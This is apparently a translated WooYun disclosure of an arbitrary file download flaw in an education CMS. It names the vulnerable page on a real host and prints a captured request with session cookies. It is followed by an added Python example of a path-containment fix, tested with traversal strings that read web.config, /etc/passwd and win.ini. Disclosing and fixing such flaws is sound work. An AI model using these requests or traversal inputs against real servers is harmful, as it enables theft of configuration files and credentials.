
An education CMS with a very large user base has an arbitrary file download vulnerability

2014-12-24 06:00

Vulnerable page: http://www.hbycscjzx.com//OperationManage/DownFile.aspx

First, register an ordinary user account.

In the personal center, while writing a site message, attach a file and capture the request. The following request is sent:

Code area
POST /OperationManage/DownFile.aspx HTTP/1.1
Host: www.hbycscjzx.com
Proxy-Connection: Keep-Alive
Content-Length: 114
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
Accept-Language: zh-CN
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SE 2.X MetaSr 1.0)
Referer: http://www.hbycscjzx.com/BlogManage/Message/SendMessage.aspx
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=5gjdmhzyg2rskqaecq3pk455; GrowUpEdu_RecordStatTimeCookie_Site=GrowUpEdu_RecordStatTimeCookie_Site_value=GrowUpEdu_RecordStatTimeCookie_Site; GrowUpEdu_RecordStatTimeCookie_SystemArticleStat_608=GrowUpEdu_RecordStatTimeCookie_SystemArticleStat_608_value=GrowUpEdu_RecordStatTimeCookie_SystemArticleStat_608; GrowUpEdu=9713DA293A50EEDE01610061006100610061000000E158DDAAEAD7CF0100E1902AD003D8CF0142006C006F0067004000390065003400340038003000610061002D0037006300360035002D0034003600350030002D0061006500370032002D0037003900360066006500330065003200340064006200370000002F000000; MyHomeNav=personal

path=myhome.aspx&name=index.aspx



The body carries a path parameter. DownFile.aspx reads the file named by path and returns it as a download (name only sets the file name the browser sees), so changing the value of path fetches any file the web application process can read. The only prerequisite is an ordinary registered account.
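The report stops at the observation above and leaves the fix section empty. The following is an added example, not code from the report or from the CMS: it puts a minimal handler that uses the path value raw (the behaviour described above) beside a canonicalise-then-contain check, and runs both over constructed attacker inputs. The serving directory /var/www/cms/uploads and the function names are assumptions for the example; the report does not say where the CMS stores attachments, and the real server runs ASP.NET on Windows, where the same containment logic applies after the framework has already form-decoded the parameter once.

```python
"""Added example (not the CMS's code): raw use of a user-controlled 'path'
parameter versus a canonicalised containment check for a download handler."""
import posixpath
from typing import Optional

# Assumption: the only directory the download handler may serve files from.
ALLOWED_ROOT = "/var/www/cms/uploads"


def vulnerable_resolve(allowed_root: str, requested: str) -> str:
    """What DownFile.aspx effectively does with path=...: join and read.

    posixpath.join discards allowed_root when 'requested' is absolute, and
    normpath happily walks '..' out of the root, so the caller serves
    whatever the attacker named.
    """
    return posixpath.normpath(posixpath.join(allowed_root, requested))


def resolve_download_path(allowed_root: str, requested: str) -> Optional[str]:
    """Map the user-supplied 'path' value to a file under allowed_root.

    Returns the canonical absolute path to serve, or None if the request
    would escape the root. The decision is made on the canonical path, not
    on the raw string, so '..', mixed separators and absolute paths all
    fall out of one comparison instead of a list of bad substrings.
    """
    if not requested or "\x00" in requested:
        return None                     # empty value, or NUL-truncation trick
    # .NET on Windows treats '\\' and '/' alike, so fold them before normalising.
    normalised = requested.replace("\\", "/")
    # Absolute paths (/etc/passwd, C:\Windows\...) are never legitimate here.
    if normalised.startswith("/") or (len(normalised) > 1 and normalised[1] == ":"):
        return None
    root = posixpath.normpath(allowed_root)
    candidate = posixpath.normpath(posixpath.join(root, normalised))
    # Compare against root + '/' rather than root: a sibling directory such
    # as /var/www/cms/uploads2 passes a naive startswith(root) test, and
    # path='.' would otherwise resolve to the directory itself.
    if not candidate.startswith(root + "/"):
        return None
    return candidate


# Constructed attacker and legitimate inputs for the demo below.
SAMPLE_REQUESTS = [
    "myhome.aspx",               # the value seen in the captured request
    "2014/09/attachment.jpg",    # a nested file under the root
    "a/../myhome.aspx",          # '..' that stays inside the root
    "../../web.config",          # classic traversal out of the root
    "..\\..\\web.config",        # same, with Windows separators
    "/etc/passwd",               # absolute path
    "C:\\Windows\\win.ini",      # absolute Windows path
    "../uploads2/secret.txt",    # sibling-directory prefix trick
    "report.pdf\x00.jpg",        # NUL byte
]


def compare_all(allowed_root: str = ALLOWED_ROOT) -> dict:
    """Return {requested: (raw_result, checked_result)} for every sample."""
    return {
        req: (vulnerable_resolve(allowed_root, req), resolve_download_path(allowed_root, req))
        for req in SAMPLE_REQUESTS
    }


if __name__ == "__main__":
    for req, (raw, checked) in compare_all().items():
        print(f"{req!r:28} raw -> {raw!r:38} checked -> {checked!r}")
```

The stronger fix for a handler like this is not to accept a path at all: hand out an opaque attachment id, look the real location up server-side, and check that the requesting account owns that attachment. Where a path must be accepted, the check above belongs after the framework's own decoding and before any File.Open, and the handler should additionally refuse to follow symbolic links out of the root.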

Proof of vulnerability:

(screenshot: QQ图片20140924194910.jpg)

(screenshot: QQ图片20140924195011.jpg)

Fix:


Source: www.wooyun.org/bugs/wooyun-2014-077210

Views: 144670 | Comments: 0 | Tags: cms
